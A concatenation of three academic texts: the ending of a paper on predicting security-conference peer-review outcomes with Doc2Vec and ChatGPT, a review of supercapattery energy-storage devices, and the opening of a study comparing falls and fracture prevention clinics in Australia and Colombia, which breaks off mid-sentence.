While the detection of novelty, contributions, and other merits may still be in an early stage of development, ML-based tools are already assisting human peerreview processes in various ways. For example, there are established approaches for detecting academic plagiarism [12]. Additionally, reviewers can leverage MLpowered tools like Grammarly and ChatGPT to help with their assessment of writing quality and clarity. With the help of these existing tools, reviewers are encouraged to focus more on the paper's novelty, contribution, correctness, and prospect of a paper as they can allocate less time worrying about plagiarism and typos. By offering positive incentives, we believe that AI tools play a beneficial role in enhancing the peer-review system.
Conclusion
To study the predictability of peer reviews for security papers, we tested the reviewing capabilities of a Doc2Vec-based method and a ChatGPT-based method on top-tier conferences on computer security and privacy. The results demonstrate that Doc2Vec-based method achieves approximately 90% prediction accuracy, while ChatGPT achieves only 50% accuracy. While our method exhibits reasonable accuracy in predicting reviewing outcomes for security research papers, there is a noticeable error rate. In the meantime, utilizing AGI models like ChatGPT for academic review still requires substantial advancements. We conclude that our proposed method could predict the reviewing outcomes for security research papers with reasonable accuracy, but the error rate is non-negligible. Despite acknowledging the limitations of our method, we explore the AI performance in cybersecurity peer-review task and discussed our findings with regards to the peerreview system. In conclusion, the peer review system has successfully adapted to numerous challenges over the past decades. We hope our work encourages further research to address the evolving challenges faced by peer review in the AI era.
A Common Peer-Review Process
Peer review is a crucial process of computer science conferences, aiming to assess papers submitted to corresponding venues by other experts or peers. As an indispensable part of the scholarly research cycle, peer review plays a crucial role in publishing and disseminating state-of-the-art research and results. Many security conferences have turned to a more journal-style peer-review process in recent years (the entire review process is depicted in Figure 2). The final decision now includes not only accept and reject, but also revision. Additionally, the number of review cycles per year increased: CCS and NDSS now have two review cycles per year; USENIX Security has three rolling review cycles, the same number that IEEE S&P has recalibrated to from an earlier per-month review cycle with 12 submission deadlines per year. The review is double-blind across all the review stages, meaning the identities of authors and reviewers are hidden from each other. The review process happens in multiple review rounds; papers that make the first round get additional reviewer assignments. An overview of the peer-review process for top computer conferences on security and privacy is shown in Fig 2.
B Prompt of ChatGPT Experiment
We use the following prompt to let ChatGPT act as a reviewer: Fig. 2: The paradigm of the peer-review process for "top-tier" security conferences. This diagram includes all steps of the post-submission life cycle of a paper. Dashed lines indicates optional procedures. Bold and color fonts indicate decisions. Different conferences vary in the details, but in general, they all conform to a similar paradigm. For example, "Accept on Shepherd Approval" is similar to "Conditional Accept or Minor Revision". "Early Reject" is essentially similar to "Reject", but those papers do not reach the second round of review.
You are an experienced and fair reviewer from top cybersecurity conferences (NDSS, IEEE S&P, CCS and USENIX Security). I will give you a paper for you to read and review. Due to the token limitation, I will split the paper content into some chunks and I will let you read the entire paper chunk by chunk. Please only reply with "OK" if the text does not contain "<|end_of_paper|>". Once you receive it, please merge the previous messages together into a full paper for you to review. I want you to decide whether this paper should be accepted or not. You must first tell me your decision with "Accept" or "Reject", and then explain your reasons in concise language. Table 5 contains the information of the proceedings we collect. | 2023-09-13T06:43:07.540Z | 2023-09-11T00:00:00.000 | {
"year": 2023,
"sha1": "5091c414f301d5fb026d791b41ae2047dbcf7992",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "5091c414f301d5fb026d791b41ae2047dbcf7992",
"s2fieldsofstudy": [
"Computer Science"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
218954866 | pes2o/s2orc | v3-fos-license | Supercapattery: Merit merge of capacitive and Nernstian charge storage mechanisms
Abstract Supercapattery is the generic name for hybrids of supercapacitor and rechargeable battery. Batteries store charge via Faradaic processes, involving reversible transfer of localised or zone-delocalised valence electrons. The former is governed by the Nernst equation. The latter leads to pseudocapacitance (or Faradaic capacitance) which may be differentiated from electric double layer capacitance with spectroscopic assistance such as electron spin resonance. Because capacitive storage is the basis of supercapacitors, the combination of capacitive and Nernstian mechanisms has dominated supercapattery research since 2018, covering nanostructured and compounded metal oxides and sulphides, water-in-salt and redox active electrolytes and bipolar stacks of multicells. The technical achievements so far, such as specific energy of 270 Wh/kg in aqueous electrolyte, and charging–discharging for more than 5000 cycles, benchmark a challenging but promising future of supercapattery.
Challenges to conventional electrochemical energy storage
Replacing fossil fuels by renewables requires energy storage, for which electrochemical energy storage (EES) devices are a desirable fit because of their modular nature, commercial choices and potentially fossil-comparable energy capacity. On the last point, oxidation of lithium in electrochemical cells causes a Gibbs energy change (G o Li = 8.56 kWh/kg at 1000 o C) that is comparable to that of coal combustion (9.16 kWh/kg) in internal combust engines (ICEs) [1]. Representative commercial EES devices include rechargeable batteries (RBs) and supercapacitors (SCs), whilst flow batteries are suitable for stationary and large scale storage [2][3][4]. Although far better in energy efficiency than ICEs (ca. 20%), EES devices have neither performed to expectations. Laboratory-tested lithium-air battery (LAB) and commercial lithium-ion battery (LIB) can only store energy up to 1.0 and 0.3 kWh/kg, respectively, pending further improvement in rate and durability.
Performance wise, RBs offer higher storage capacity than SCs which are however better in power capability, energy efficiency, and cycle life. These complementary merits have encouraged development of several hybrid devices, including lithium-ion capacitors, redox capacitors, and pseudocapacitors [5]. These hybrids store charge differently from a capacitor, but the word capacitor in these names has led to misuse of capacitance as a performance indicator [6]. For unambiguous classification and comparison, the generic name supercapattery (= supercapacitor + battery) was proposed in 2007, followed by laboratory demonstration later [7,8]. In fact, combination of capacitive and lithium storage electrodes was reported in earlier literatures, although the term "lithium-ion capacitor" (LIC) first appeared also in 2007 [9][10][11][12]. Because of their close relation with LIBs, research and development of LICs have progressed fast, along with other ion capacitors [13][14][15]. On the contrary, supercapattery rarely appeared in the literature before 2015. The recent growing interests are partly driven by curiosity and exploration of new and improved EES mechanisms, materials and devices beyond SCs and RBs [16][17][18]. The other and more fundamental reason is related to pseudocapacitance that has been, unfortunately, misused to account for the behaviour of many new transition metal compounds that are capable of Nernstian storage.
Pseudocapacitance explained
All rechargeable EES devices work following one or a combination of electric double layer (EDL) capacitive, pseudocapacitive and battery-like mechanisms [4]. EDL storage is physical at the electrode/electrolyte interface, whilst the latter two involve charge transfer reactions on electrode and hence are both Faradaic in nature. Battery-like or Nernstian storage is widely known to result from reversible electrode reactions that are broadly governed by the Nernst equation. It is featured by peak-shaped cyclic voltammograms (CVs) and by potential plateaux on galvanostatic charging-discharging plots (GCDs). Pseudocapacitance (or Faradaic capacitance) presents features same as those of EDL capacitance, namely rectangular CVs and linear GCDs. A hypothesis explains such differences by the transfer of localised and partially or zone-delocalised valence electrons, leading to Nernstian and pseudocapacitive responses, respectively [19]. It agrees with density functional theory modelling of oxygen doped graphenes [20,21]. According to the band model [22], localised valence electrons have a fixed electronic energy level, corresponding to a fixed potential for their transfer. This in turn leads to peak-shaped CVs, and plateau-featured GCDs for Nernstian storage. For zone-delocalised valence electrons as in semiconductors (instead of full delocalisation as in metals and perfect monolayer graphene), their very close electronic energy levels are merged to a sufficiently wide band, into or from which electron transfer occurs in a continuous range of potentials. This hypothesis reflects well the rectangular CVs and linear GCDs for pseudocapacitive storage.
Although electrochemical characteristics of pseudocapacitance and EDL capacitance are recognised to be the same [4,6, [23][24][25], some authors claimed differentiation between the two based on simulation against equation (11) or (12) below [26][27][28], where i and v are the current and potential scan rate of the CV, respectively, and a, b, m and n are constants. For surface confined processes, b = 0, n = 1, but under diffusion control, a = 0, n =1/2. Otherwise, the electrode reaction is under mixed control. It was assumed, but incorrectly, that the EDL currents resulted from surface confined changes and hence were proportional to v, whilst Faradaic contributions were diffusion controlled, showing a linearity of i on v 1/2 . Obviously, these assumptions contradict the basic knowledge that surface confined processes, either capacitive or Nernstian, dominate the behaviour of relatively thin electrode coatings. Also, diffusion control could happen in relatively thick electrode coatings, into or from which transport of ions are necessary to maintain charge neutrality, for both capacitive and Nernstian processes.
In fact, a Faradic process, either Nernstian or capacitive, always unpairs or pairs electrons in the atomic or molecular orbits, which in turn generates or demolishes spins that can be monitored by electron spin resonance (ESR) spectroscopy [29,30]. Fig. 1a shows the CVs of polyaniline (PAn). Whilst the three peak couples (A1/C1, A2/C2 and A3/C3) are well explained elsewhere [33,34], the capacitive responses are evident between 0.1 and 0.5 V. For comparison, Fig. 1b presents a typical cyclic esrogram of PAn between -0.2 and 0.5 V [30]. It can be seen that the ESR signal varied similarly as the currents on the CVs between 0.1 and 0.5 V, which is strong evidence of Faradaic dis-/charging with insignificant EDL contribution, if any. Note that A1 on the esrogram is at a more positive potential than A1 on the CVs. This difference is due to the ESR signal being proportional to the amount of charge passed, instead of the charge flow rate, i.e. the current.
Basics of supercapattery and early development
Aiming at merging the merits of SC and RB [4,5, 18,24], supercapattery engages with both capacitive and Faradaic mechanisms [18,46]. Because capacitive storage can be EDL or pseudocapacitive, and Faradaic storage can be pseudocapacitive or Nernstian, there is a large number of combination options.
Supercapattery behaviour can result from materials, such as heat treated nickel hydroxide films which exhibited fairly rectangular CVs from 0 to 0.35 V vs. SCE, but presented large current peaks at more positive potentials in aqueous KOH [47]. Composites of manganese oxides (MnOx, 1.5 < x 2) with carbon nanotubes (CNTs) or graphenes can also store charges in mixed mechanisms [48][49][50]. Further, engaging electron transfer reactions of soluble species, such as iodide ions, with EDL capacitance of a porous carbon electrode is another effective way to combine capacitive and Nernstian mechanisms [24,[52][53][54].
The device approach to supercapattery considers the relations between the two electrodes. Firstly, the charges passing through the capacitive (Qcap) and Nernstian (Qbat) electrodes must be equal as expressed by equation (13) [4] where Qsp is the specific charge, and Csp the specific capacitance.
Equation (14) is useful for designing supercapattery, disregarding whether the capacitive or Nernstian electrode is the positrode or negatrode.
Secondly, equal currents occur on both electrodes at any time. For reversible storage in thin films, equation (15) governs the relation, linking with the Nernst equation (16) for reduction (charging on positrode, or discharging on negatrode) [4]: where is the amount of the relevant or all redox species in the thin film. Equations (15) and (16) were used to calculate the GCD plots in Fig. 2a . For example, hydrothermal doping 40% sulfur into FeCo2O4 produced nanocaterpillars, and increased the capacitance to 1801 F/g from 779 F/g without doping at 2 A/g. The CVs and GCDs were fairly capacitive, but the capacitive potentials ranged only from 0 to 0.5 V vs. Ag/AgCl. Supercapatteries made from an undoped FeCo2O4 negatrode and the sulfur-doped positrode performed very well in aqueous 3 mol/L KOH. The cell voltage was 1.45 V, achieving specific energy and power of 140 Wh/kg and 1434 W/kg, respectively, and over 5000 dis-/charging cycles [16]. However, CVs and GCDs of the supercapattery showed clear resistive distortion, indicating higher resistance of the undoped negatrode. Also, energy efficiency estimated from the GCD at 2 A/g was lower than 60%.
Nanosheets of MoS2 were hydrothermally grown in the pores of a carbon nitride template [17]. In aqueous 1 mol/L KOH, the composite showed Nernstian CVs and GCDs from 0.0 V to 0.5 V. The specific charge capacity reached over 500 C/g. Surprisingly, a symmetrical supercapattery was built from this material, leading to unreasonable tests and results.
An interesting Nernstian positrode was made from nanosheets of carbon-coated Li3V2(PO4)3 [45]. Li3V2(PO4)3 offers three valence states of V (III, IV and V), corresponding to storage of three Li + ions per formula at high positive potentials, > 3.8 V vs Li/Li + . With an activated carbon negatrode in mixed organic carbonates, the supercapattery was tested to 2.7 V to ensure reversible lithium storage in Li3V2(PO4)3/C. The cell GCDs presented two shoulders, reflecting two steps of lithium storage. Reported specific energy and power were 53 Wh/kg and 3 kW/kg, respectively. However, after 2000 cycles, capacity loss reached 35%, apparently because repeated lithium-ion insertion and removal caused microscopic fatigue damage in the positrode.
Carbon negatrodes are often chosen for aqueous electrolytes, imposing high overpotentials for hydrogen evolution. Further, nano-pores of activated carbon permit proton or water reduction to adsorbed hydrogen atoms or molecules, but restrict their nucleation and growth into bubbles. These adsorbed hydrogen species can also be re-oxidised and hence increase charge storage capacity [57,58].
More desirable negatrodes are based on active metals because of their very negative redox potentials and reversible electrode reactions [13-15, 55,56]. The concern on dendritic deposition upon cycling are addressed by several approaches, such as pulsed charging for both zinc and lithium deposition [59,60] and using 3D structured (porous) current collectors (e.g. copper foam) for lithium deposition [61,62].
Transition metal oxides are usually used on positrode, but iron or tungsten oxide undergoes reversible changes at negative potentials [63][64][65]. The crystalline/amorphous core/shell structured iron oxide with oxygen vacancies exhibited both capacitive and Nernstian features in 1 mol/L LiOH as shown in Fig. 3a and 3b. Specific capacitance of 701 F/g was claimed as averaged from the GCD plot. However, the reported GCD at 0.5 mA/cm 2 was nonlinear, whilst the equation used for capacitance calculation, = ∆ ∆ , actually gives results for the inserted triangular dashed line in Fig. 3b. Thus, the performance should be better represented by specific charge. Further, the GCD is asymmetrical along the time axis, showing longer times for charging than discharging, suggesting a Columbic efficiency much lower than that for a true capacitive electrode. Fig. 3c and 3d compare the CVs and GCDs of WO3 and W5O14. Clearly, the oxygen deficient W5O14 performed better. In addition, the crystalline W5O14 contained more ion channels than WO3. Consequently, the specific capacitance increased from 371 F/g for WO3 to 524 F/g for W5O14 as derived from fairly linear GCDs. Note that, against convention, the GCDs in Fig. 3d start from discharging and then charging.
An advanced approach to avoiding water decomposition is to use the so called water in salt (WIS) electrolytes in which all water molecules are bounded to, or surrounded closely by salt ions, water decomposition may not occur up to 3.0 V [66][67][68][69]. However, because of the minimum separation by a few layers of coordination and solvation water molecules, and hence strong attractions between cations and anions, WIS electrolytes show high viscosity and low conductivity. Addition of co-solvents could improve the performance, but also narrow the potential window [67,70].
Non-aqueous electrolytes, including ionic liquids, offer wider potential windows for utilising the very negative potentials of, for instance, lithium metal or lithiated carbon [9-11,13-15,45, [71][72][73]. In such cases, the electrolyte not only conduct ions, but also participate in redox reaction, e.g. lithium-ion reduction or intercalation, which contributes directly to dis-/charging of the cell.
Similarly, redox electrolytes also help enhance storage in supercapacitors via both capacitive and Nernstian mechanisms [51][52][53][54]74]. Comparing with making new electrode materials, dissolved redox species (DRS) in electrolyte offer a simpler and cheaper approach to enhanced storage. A key issue is the cycling of electro-reacted DRS between the positrode and negatrode via diffusion. For example, halide ions (X ) are the early DRS [51,74] with a reversible electro-reaction of 3X = X3 + 2e. Because both X and X3 are anions, they should be electrostatically attracted to, and trapped inside the pores of the activated carbon positrode. However, oxidation of I occurs near the equal potential of the positrode and negatrode at full discharge, causing insufficient electrostatic attraction and hence redox cycling [52]. This understanding explains the current peaks near 0 V on the cell CV in Fig. 4a, and agrees with the absence of any current peaks on the CVs in Fig. 4b for the cell containing Br whose oxidation potential is about 500 mV more positive than that of I . Fig. 4c shows that simply discharging the cell to 0.1 V (not 0 V) also eliminated redox cycling [53]. By doing so, the cell repeated dis-/charging at 0.5 A/g to 4000 cycles with only 4 % capacitance loss.
Emerging merit-merging innovations
A particular recent progress is the combination of more than two storage mechanisms into supercapattery. A zinc-bromine supercapattery was studied, combining EDL capacitive, pseudocapacitive and Nernstian storage [54], although the claimed pseudocapacitive storage was in fact Nernstian with Br oxidation. This supercapattery was tested to 270 Wh/kg at 9300 W/kg with 81% capacity retention after 5000 cycles.
The combination of a positrode of the polyaniline/nano carbon fibres (NCF) composite, a NCF negatrode for lithium intercalation, and a polymer gel electrolyte had led to a flexible supercapattery that offered specific energy of 106.5 Wh/kg, and 70.3% capacity retention after 9000 cycles [75].
Last but not the least, the sandwich configuration of supercapattery (and supercapacitor) permits to use bipolar electrodes to serially stack multi-cells [76]. A basic advantage is that if n cells are to be serially connected, the number of electrodes is 2n for external connection, but n+1 for bipolar stacking [76]. This will reduce significantly the mass and volume of the stack, and benefit to all gravimetric and volumetric properties. Importantly, the bipolar plates must be both liquid and gas proof. While the initial effort used titanium foils as the bipolar plates, it was shown that 50 m thick carbon black/polyethylene composite films could be sufficiently conductive (through the film plane) and non-permeable, which also helped the fabrication of pouch cells for stacking [77]. The stack of bipolarly connected Zn-Br2 cells performed satisfactorily, reaching 50 Wh/L and 500 W/L with less than 1 % loss over 500 dis-/charging cycles. Graphite plates with vertically grown CNTs on both sides were also used to stack EDL cells that retained 96.7% of the initial capacity after 50000 cycles [78].
End remarks
Supercapattery is being developed amongst questions on what should be defined for battery and supercapacitor, particularly in relation with the confusion on pseudocapacitance. It is identified that electrode reactions can involve the transfer of either localised valence electrons governed by the Nernst equation which is the basis of batteries, or zonedelocalised valence electrons leading to pseudocapacitive behaviour. Aiming at merging the merits of Faradaic Nernstian and capacitive storage mechanisms, supercapattery research has progressed steadily since 2018, utilising nanostructured and compounded metal oxides and sulfides capable of Nernstian storage, salt-in-water and redox active electrolytes, and bipolar stacks. There are undoubtedly further improvements but, thanks to the knowledge and technology advancements in batteries and supercapacitors, supercapattery will become more competitive and promising in the near future.
Conflict of interest statement
The author has no conflict of interest to declare.
Acknowledgements
The author thanks the invaluable research contributions from all collaborators, and postdoctoral and postgraduate co-workers whose names appear in the list of References, and also the financial supports from the EPSRC (EP/J000582/1, GR/R68078), Royal Society The authors have made a good effort to clarify some typical misuses of scientific and technical terms, and conceptual misunderstanding and confusions in the EES literature, such as anode and cathode versus negatrode and positrode in terms of electrode reactions and electrical polarity, and pseudocapacitance and battery-like storage in terms of Faradaic processes. This article reviews a relatively rare collection of literatures on sodium and potassium ion capacitors, focusing on the anode (= negatrode) materials. This article is worth reading if one considers the sustainability of energy storage technologies in terms of the wide and cheap availability of sodium and potassium resources compared with the highly geographically limited lithium resources.
In the context of LICs, the authors have focused on the preparation, characterisation and application of various carbon materials for making the cathode (= positrode) and anode (= negatrode), highlighting the ways for, and effects of nanoengineering, doping, graphitisation, porous structuring and surface modification.
[16]* Lalwani S, Joshi A, Singh G, Sharma RK: Sulphur doped iron cobalt oxide nanocaterpillars: An electrode for supercapattery with ultrahigh energy density and oxygen evolution reaction, Electrochim. Acta 2019, 328: 135076. https://doi.org/10.1016/j.electacta.2019.135076 The authors report a novel study on the positive contribution of doping Fe2CoO4 with sulfur to increasing the specific capacitance. The hydrothermal process for sulfur doping is likely also effective on other transition metal oxides. The authors report a hydrothermal process for growing redox active MoS2 in the sub-micron pores of a C3N4 template. The idea to prepare a composite of two metallic compounds via direct growth one in the porous template of another is novel and effective. While CVs and GCDs the composite show good Nernstian storage performance, it is advisable for readers not to test Nernstian materials in a symmetrical cell. The authors report a rare work on doping Se into Ni-Co sulfide in the form of nanotubes or nanofibrils grown vertically on individual fibres of carbon cloth, forming a free standing positrode. Interesting SEM images of the nanotubes on single fibre are presented. CVs and GCDs were systematically applied to study the composite, revealing a positive contribution from Se doping to Nernstian storage capacity. This is a systematic study of the interesting electrochemistry of V(I, II, III) in the title mentioned composite for lithium storage at high positive potentials (3.0 to 4.3 V vs. Li + /Li) in mixed organic carbonate electrolyte. The specific energy of a supercapattery of the composite negatrode and an activated carbon positrode was measured to be 53 Wh/kg at a cell voltage of 2.7 V. The mass ratio of negatrode-to-positrode was 2:1, but no explanation was given how this ratio was selected, implying further improvement may be achievable A very simple approach is proposed and tested successfully to avoid redox cycling of iodide and tri-iodide ions between the positrode and negatrode of the same carbon material by limiting the discharging cell voltage to 0.1 V, instead of 0 V. This approach should also be applicable to avoid redox cycling in other supercapatteries with capacitive electrodes and redox active electrolytes.
[54]** Yu F, Zhang CM, Wang FX, Gu YY, Zhang PP, Wacklawik ER, Du AJ, Ostrikov K, Wang HX: A zinc bromine ''supercapattery'' system combining triple functions of capacitive, pseudocapacitive and battery-type charge storage. Mater Horizon 2020, 7:495-503 https://doi.org/10.1039/c9mh01353a The authors report an effective research effort to combine three different charge storage mechanisms into a unique aqueous supercapattery. The claimed specific energy of 270 Wh/kg (without considering the mass of added KBr in the electrolyte) is amongst the top range of all reported EES devices with aqueous electrolytes.
The work reported is a conductive and non-permeable polymer-carbon composite membrane as thin as 40 m. The conductivity of the composite is actually not very high in comparison with conventional conducting materials, but because of the thinness of the membrane, the through plane resistance of the membrane is sufficiently small. The challenging task is then to make such a thin membrane non-permeable to ions in aqueous solution, which seems to be successfully achieved. The work represents an important progress in development of affordable and corrosion resistant bipolar plate materials to serially stack multiple EES cells. [34] and [30]. Fig. 4. CVs of supercapattery with activated carbon positrode and negatrode containing indicated electrolytes. Note that the potential window is from 0 to 1.5 V in (a) and (b) but from 0.1 to 1.5 V in (c) where the black line and red dashed line CVs were recorded before and after 100 charging-discharging cycles. Redrawn from refs. [52,53] | 2020-05-07T09:08:14.572Z | 2020-06-01T00:00:00.000 | {
"year": 2020,
"sha1": "7cde0142296c59594090873f55306b02ee14a1fe",
"oa_license": "CCBY",
"oa_url": "http://eprints.nottingham.ac.uk/60890/1/Supercapattery%20Merit%20merge%20of%20capacitive%20and%20Nernstian%20charge%20storage%20mechanisms.pdf",
"oa_status": "GREEN",
"pdf_src": "Adhoc",
"pdf_hash": "82d3d35f11d656dbae44e720efbb5d6fe940dcfe",
"s2fieldsofstudy": [
"Materials Science"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
1717366 | pes2o/s2orc | v3-fos-license | Differing approaches to falls and fracture prevention between Australia and Colombia
Falls and fractures are major causes of morbidity and mortality in older people. More importantly, previous falls and/or fractures are the most important predictors of further events. Therefore, secondary prevention programs for falls and fractures are highly needed. However, the question is whether a secondary prevention model should focus on falls prevention alone or should be implemented in combination with fracture prevention. By comparing a falls prevention clinic in Manizales (Colombia) versus a falls and fracture prevention clinic in Sydney (Australia), the objective was to identify similarities and differences between these two programs and to propose an integrated model of care for secondary prevention of fall and fractures. A comparative study of services was performed using an internationally agreed taxonomy. Service provision was compared against benchmarks set by the National Institute for Health and Clinical Excellence (NICE) and previous reports in the literature. Comparison included organization, administration, client characteristics, and interventions. Several similarities and a number of differences that could be easily unified into a single model are reported here. Similarities included population, a multidisciplinary team, and a multifactorial assessment and intervention. Differences were eligibility criteria, a bone health assessment component, and the therapeutic interventions most commonly used at each site. In Australia, bone health assessment is reinforced whereas in Colombia dizziness assessment and management is pivotal. The authors propose that falls clinic services should be operationally linked to osteoporosis services such as a “falls and fracture prevention clinic,” which would facilitate a comprehensive intervention to prevent falls and fractures in older persons.
Introduction
Falls and fractures are intimately linked and are major causes of morbidity and mortality in older people. Previous fall and/or fracture are the most important risk factor for further events; 1 therefore, secondary prevention programs for falls and fractures are highly needed. Although falls clinics have been established as a model of care for falls management and prevention among the elderly, there is not a widely accepted definition or standard model for a falls clinic in the research literature. Falls clinics have been defined as: … specialist multidisciplinary services, which focus on the assessment and management of clients with falls, mobility and balance problems. Clinics commonly provide time limited, specialist intervention to the client and advice and referral to mainstream services for ongoing management. They provide education and training to clients, to carers, and to health professionals. 2 Since the late 1980s, falls clinics have been gaining momentum as an integrated model for falls prevention around the world. The first multidisciplinary falls clinic was set up in Melbourne, Australia in 1988. 2 Subsequently, the number of falls clinics has increased substantially since the late 1990s including Australia, 1-4 USA, 5-8 UK, 9 France, 10 Denmark, 11 Spain, 12 Hong Kong, 13 Canada, 14 Germany, 15 and The Netherlands. 16 In contrast, in Latin America the information related to falls clinics is scarce with reports only from Brazil and Colombia. 17,18 Overall, these programs offer a comprehensive assessment and varied interventions focused on falls prevention in older persons without taking into consideration bone health assessment. In fact, until 2000 it was a common practice not to include any assessment to evaluate osteoporosis risk or to perform bone mineral density in falls prevention trials. As a consequence, osteoporosis risk assessment was not considered as part of a major falls prevention guideline. 19 In 2001, the National Health Service in the UK established the National Service Framework for Older People, a comprehensive strategy to ensure fair, high quality, integrated health and social care services for older people. The National Service Framework set out standards for specialized and integrated falls services to improve care and treatment for those who have fallen and, for the first time, included interventions to prevent and treat osteoporosis in those at high risk. Following these guidelines, there was an increasing understanding of the natural association between falls and fractures and thus a proposal to incorporate a routine bone health assessment as part of a comprehensive assessment for falls and fractures risk in older persons was suggested. 20 However, little operational guidance was provided until a review and clinical guideline undertaken by the National Health Service policy body, the National Institute for Health and Clinical Excellence (NICE), was published in 2004. 21 In those guidelines, NICE suggested that specialist falls services should be operationally linked to bone health (osteoporosis) services and recommended that an osteoporosis risk assessment should be an essential element of a comprehensive falls assessment. 21 Since the release of these guidelines, the number of falls clinics that integrates a bone health component has grown exponentially, particularly at university hospitals. 13,14,16 However, standardizing these programs and making them efficient in different cultures and practices is still a challenge. Another remaining question is whether the model should remain as falls prevention alone or should be combined with fracture prevention. Therefore, the aim of this study was to identify similarities and differences between a falls and a falls and fractures clinic in Colombia and Australia, respectively. Characteristics of the services were compared using an internationally agreed taxonomy. Here, major similarities as well as easy to unify variations between these complementary models implemented in the two countries are reported.
Methods
In Sydney, Australia the Falls and Fractures Clinic at Nepean Hospital in Penrith began operation in October 2008 as an initiative of both the Discipline of Geriatric Medicine at Sydney Medical School Nepean and the Department of Geriatric Medicine at Nepean Hospital. Its primary aim was to reduce falls and falls-related injuries among older people in the Western Sydney community after suffering one or multiple falls and/or fractures. In Manizales, (Colombia) the Falls, Dizziness, and Vertigo Clinic at the local Geriatric Hospital was implemented in April 2001 as an initiative of the Section of Geriatric Medicine of the Faculty of Health at the University de Caldas. In addition to the aim of reducing falls among older people in the Andes Mountains community, this clinic's aim was to ameliorate dizziness symptoms in older fallers.
The analysis was designed to explore and compare the organizational structure and clinical operations of both clinics. Evaluated items were either taken from prior research on Australian falls clinics 2 or were developed specifically for this study with emphasis on falls and fracture assessment and care of patients. The questionnaire assessed characteristics of organization, administration, clients, and interventions provided at both clinics. Items that surveyed program organization included: date of commencement, setting of recruitment and assessment, frequency and duration of each assessment session, and referral sources. Administration items surveyed the number of attended patients, number of staff, staffing structure, time for initial assessment, waiting time for service, and percentage of attrition. The age, proportion of men and women, and eligibility criteria were surveyed to compare the clients in the two countries. Directors were asked to indicate the process of assessment and reassessment procedures and the types of intervention provided. In addition, data was collected on risk status identification, outcomes measured, and postintervention follow-up procedures. It also assessed whether interventions were provided by the local service or by referral to other services, referral routes, and relationships to other local facilities and services. To make the comparison easier and to develop a common language to compare the submit your manuscript | www.dovepress.com Dovepress Dovepress characteristics of the clinics, the Prevention of Falls Network Europe (ProFaNE) taxonomy of falls prevention interventions was used. 24 The implementation of NICE recommendations was also compared.
Results
A summary of organization, administration, clients, and interventions at both clinics is shown in Table 1. Concerning organization aspects, the setting was an acute hospital in Australia and a subacute Geriatric hospital in Colombia. The programs in the two countries operated with the same frequency and duration (4 hours per week). The most common method of entry into the service was a referral from a health care professional: a general practitioner in Australia and a specialist (geriatrician, physiatrist, otolaryngologist, and rheumatologist) in Colombia. In addition, both services accepted referrals from acute hospitals, although mostly from emergency department and orthopedic/geriatric wards in Australia. In Colombia, referrals from nursing care facilities were also accepted.
The number of clients attending the program and the number of patients attending per week was higher in the Australian program than in Colombia (average number of six versus three patients per session). In terms of staff, clinical staff in Australia was twice that in Colombia. However, in both clinics the staffing structure was a multidisciplinary team composing of a physiotherapist, nurse, occupational therapist, and a physician. At both clinics, members of the interdisciplinary team were engaged in discussions related to assessment tools and program planning over 1-year period prior to the establishment of the corresponding clinic. The mean length of the initial assessment was similar at both clinics (2 hours per patient). The waiting list was much longer in Colombia than in Australia. The percentage of attrition was similar in the two countries. The mean age of clients was higher in Australia than in Colombia (82 versus 74 years). There were similar proportions of men and women attending the clinics with at least two-thirds being female. The main eligibility criteria for Australian clients were falls and/or fractures (at least one episode in the previous year), whereas for Colombian clients the criteria were a report of falls and/or dizziness. In terms of interventions provided, there were similar practices with multicomponent interventions being used in both countries. Although both programs offered similar care plans in terms of falls prevention, the Australian program was more likely to prescribe vitamin D supplementation while the Colombian program was more likely to indicate individual supervised gentle balance exercises at home. Figure 1 shows the comparative flow diagram for the two countries. By comparison, the Australian program was directed at managing falls and fractures while the Colombian program was focused on managing dizziness and falls. A similar proportion of disciplines was included in the multidisciplinary assessment team and similar assessment tools were employed. While the Australian program included bone health assessment, the Colombian program included more comprehensive fall risk screening tools in Dovepress Dovepress their assessment. The initial assessment at both clinics consists of a comprehensive fall risk assessment, including a structured algorithm adapted from the Assessing Care of Vulnerable Elders (ACOVE) intervention to identify risk factors for falls. 23 Recommendations for management are generated at an interdisciplinary meeting. Each patient also receives education consisting of written materials about falls prevention, physical activity, and home safety. Bone fragility fracture risk assessment was performed using the World Health Organization's Fracture Risk Assessment Tool (FRAX ® ) in Australia but not in Colombia. High-risk status identification assessment for falling was similar in both programs. If additional interventions were needed, referral to other services was recommended. The postintervention follow-up procedures were similar in both countries with the same interdisciplinary team reassessing the clients.
Discussion
This exploratory comparative analysis of two clinics in Australia and Colombia has revealed several similarities as well as differences. The clinics in both countries have major similarities in terms of organization and administration. Both programs serve older people who are very similar in terms of age, gender, and geography (mountainous areas). In addition, the multifactorial assessment and intervention model utilized in both countries closely follows previously recommended models for falls clinics. 2,3 For identification of high-risk status for falls, both programs use the indicators developed by the ACOVE program. 23 The similarity of these findings suggests that both models could become a convergent solution to the problems associated with falling in an aging population. Falls are relatively common in both countries with similar prevalence: 28%-39% of people aged over 65 years experiencing at least one fall annually and up to 50% experiencing multiple falls. 24,25 Overall, falls clinics have demonstrated a substantial reduction (35%-77%) in falls in high-risk populations and improvements in other outcomes such as balance and mobility, physical functioning, and fear of falling. 3 Therefore, these clinics represent an approach that provides specialized services for this common geriatric syndrome in developed and in developing countries. 6,9,10,15,18 Besides the overall similarities, there were several differences between the Australian and Colombian models. The first source of difference was the type of patients seen at each site in terms of race (mostly Caucasian in Australia and mostly Mestizo population in Colombia), nutritional status (higher body mass index in Australia), and level of education (secondary degree in most of the Australian population and in just half of the Colombian population). 27 Another difference was the criteria for eligibility with falling associated or not with a fragility fracture being the priority in Australia while falling associated with dizziness being the main focus in Colombia. This could be explained by higher access for orthopedic/ geriatric wards in Australia as well as the role of the recently implemented orthogeriatric model of care. 26 On the other hand, the prevalence of dizziness in Colombia was reported to be 15.2% in the older population and associated with more prevalent chronic conditions and physical and sensory impairments. 27 Therefore, the falls clinic in the Colombian program was established in conjoint with an otolaryngology service as interdisciplinary care to solve problems of older people with falls associated with dizziness. 18 The second difference was the most common type of intervention prescribed at each clinic. Although the multicomponent program was similar in both countries, the most common type of intervention differed. Although Australia has sunny weather for most of the year, it still cannot boast a vitamin D-safe population. 28 Reasons for this are that lifestyles for many older people, particularly women, are increasingly associated with indoor activities and with foods not being fortified for vitamin D in Australia. Taken together, there is a high prevalence of vitamin deficiency in this particular Western Sydney population (45%), 29 thus a high level of vitamin D supplementation is required in this population. In 